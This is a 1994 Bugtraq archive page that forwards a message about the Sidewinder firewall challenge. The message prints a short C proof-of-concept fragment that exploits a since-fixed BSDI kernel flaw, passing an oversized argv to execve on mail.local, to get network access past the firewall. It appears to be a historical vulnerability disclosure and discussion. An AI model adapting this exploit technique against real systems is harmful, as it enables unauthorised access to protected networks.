Bugtraq mailing list archives
Yesterday this would have worked... (fwd)
From: matt () worldlinx com (Matthew Harding)
Date: Fri, 16 Dec 1994 14:12:51 -0500 (EST)
Oops, I posted the previous message to bugtraq not realizing that SCTC originally sent the message to the sneakers list. Here is the original message posted with permission, 10 points to anyone who can spot the supposed flaw in the BSDI O/S with this. BTW, anyone care to comment if this should be replicable across platforms? Cheers, Matthew (matt () worldlinx com) Forwarded message:
From owner-sneakers () CS YALE EDU Wed Dec 14 15:07:45 1994 Message-Id: <199412141927.NAA06239 () spirit sctc com> Date: 14 Dec 1994 13:35:25 -0600 From: Glenn Andreas <andreas () sctc com> Subject: Yesterday this would have worked... To: "sneakers () CS YALE EDU" <sneakers () CS YALE EDU> X-Mailer: Mail*Link PT/Internet 1.0.1 Sender: owner-sneakers () CS YALE EDU Precedence: bulk For those of you who think that the Sidewinder challenge was impossible, the following code fragment would have allowed you to get at the internal net and win a jacket. This, of course, was yesterday (and the kernel has since be fixed). You just would have had to add this fragment at the beginning of your favorite telnet client code (or whatever you wanted to use to get at the otherside of the network), and suddenly all your socket, bind, etc... calls would succeed. As for exactly how this fragment worked, that would be telling... (but suffice it to say that this approach won't help when we go to 4.4, but probably not for the obvious reasons). #include <unistd.h> #include <sys/param.h> .... main(argc, argv, envp) int argc; char **argv, **envp; { char *argv1[2]; /* build our new argv... */ argv1[0] = malloc(ARG_MAX+1); memset(argv1[0],'x',ARG_MAX); argv1[0][ARG_MAX] = 0; argv1[1] = NULL; /* exercise the bug... */ execve("/usr/libexec/mail.local",argv1,envp); /* and at this point we can get at the net... */ [ insert your favorite telnet client code here.... ] --- "You think that's funny? I'll show you funny..."
Current thread:
- Yesterday this would have worked... (fwd) Matthew Harding (Dec 16)
- <Possible follow-ups>
- Re: Yesterday this would have worked... (fwd) der Mouse (Dec 17)
- Re: Yesterday this would have worked... (fwd) Timothy Newsham (Dec 17)
- Sun Patch Id #102060-01 Mitch Wright (Dec 18)
- Re: Sun Patch Id #102060-01 Alain Durand (Dec 19)
- Re: Sun Patch Id #102060-01 Karl Strickland (Dec 19)